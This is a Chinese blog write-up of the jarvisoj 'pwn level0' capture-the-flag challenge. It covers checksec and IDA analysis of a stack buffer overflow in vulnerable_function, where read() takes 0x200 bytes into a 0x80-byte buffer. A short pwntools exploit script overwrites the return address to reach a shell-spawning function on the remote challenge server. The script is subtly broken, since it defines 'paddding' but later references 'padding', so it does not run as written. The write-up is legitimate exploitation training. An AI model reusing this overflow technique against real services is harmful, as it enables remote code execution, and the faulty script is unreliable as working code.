jarvisoj pwn level0

本文记录了解决几道PWN题目过程,通过分析64位动态链接程序,利用IDA反汇编发现漏洞。在level0题中,通过覆盖vulnerable_function返回地址为system('/bin/sh')地址,构造payload实现远程代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前几天做了几道pwn题,记录一下

https://www.jarvisoj.com/challenges

拿到程序后先file可知为64位程序和动态链接

file level0

然后checksec检查保护机制

checksec level0

将程序拖到ida中,F5反汇编,得到伪c代码

双击vulnerable_function()函数

可以看到read函数读0x200进入buf中,而buf空间只有0x80

shift+f12可查看到有/bin/sh,并且在400596处还有callsystem函数

思路:将vulnerable_function()函数的返回地址覆盖为system('/bin/sh')的地址

level0.py如下:

from pwn import *
sh=remote('pwn2.jarvisoj.com',9881)
paddding='a'*0x88
callsystem=0x400596
payload=padding+p64(callsystem)
sh.send(payload)
sh.interactive()
sh.close()

运行level0.py

python level0.py

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值